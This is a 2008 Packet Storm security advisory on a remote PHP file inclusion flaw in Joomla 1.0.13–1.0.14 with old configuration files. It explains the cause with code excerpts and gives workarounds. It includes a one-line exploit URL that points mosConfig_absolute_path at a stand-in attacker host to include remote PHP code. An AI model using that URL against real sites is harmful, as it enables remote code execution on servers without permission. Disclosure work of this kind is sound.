joomlaoldconfig-rfi.txt

2008-02-14T00:00:00
ID PACKETSTORM:63648
Type packetstorm
Reporter Hendrik Jan Verheij
Modified 2008-02-14T00:00:00

Description

                                        
                                            `Affects: Joomla 1.0.13 - 1.0.14  
Vulnerability: (remote) PHP file inclusion possible if old  
configuration.php  
Date: 14-feb-2008  
  
Introduction:  
  
Remote PHP file inclusion is possible when RG_EMULATION is not defined  
in  
configuration.php. This is typical when upgrading from an older version,  
leaving configuration.php untouched. Furthermore, in PHP,  
register_globals  
must be 'off', for this exploit to work.  
  
In Joomla >=1.0.13, configuration.php-dist disables register_globals  
emulation, by defining RG_EMULATION false. In older Joomla versions,  
this  
was defined in globals.php instead.  
  
Users upgrading, without touching configuration.php (quite typical),  
will have RG_EMULATION  
unset, resulting in the following vulnerability.  
  
In Revision 7424 of globals.php, the 'configuration.php' file is  
included  
before registerGlobals() is called, allowing a malicious peer to  
override any value set in configuration.php.  
  
Details:  
  
Since revision 7424, globals.php includes 'configuration.php' if  
RG_EMULATION is unset, and enables RG_EMULATION by default for 'old  
configuration files':  
  
if( defined( 'RG_EMULATION' ) === false ) {  
if( file_exists( dirname(__FILE__).'/configuration.php' ) ) {  
require( dirname(__FILE__).'/configuration.php' );  
}  
  
if( defined( 'RG_EMULATION' ) === false ) {  
// The configuration file is old so default to on  
define( 'RG_EMULATION', 1 );  
}  
}  
  
The registerGlobals function is called *after* having included  
'configuration.php':  
  
} else if (ini_get('register_globals') == 0) {  
// php.ini has register_globals = off and emulate = on  
registerGlobals();  
  
Maliciously set GET variables cause variables set by configuration.php  
to be overwritten.  
  
Looking in index.php:  
  
require( 'globals.php' );  
require_once( 'configuration.php' );  
  
Since 'configuration.php' was already included by globals.php, the  
require_once() won't include the configuration.php again (leaving  
"attacker's" values untouched!).  
  
The exploit:  
  
http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s  
cript.txt  
  
Workaround:  
  
In index*.php and administrator/index*.php change:  
  
require_once( 'configuration.php' );  
  
to  
  
require('configuration.php');  
  
Or disable RG_EMULATION by using the line in configuration.php-dist in  
configuration.php:  
  
if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by  
default for security  
  
Regards,  
  
  
Hendrik-Jan Verheij  
BWSS B.V.  
  
`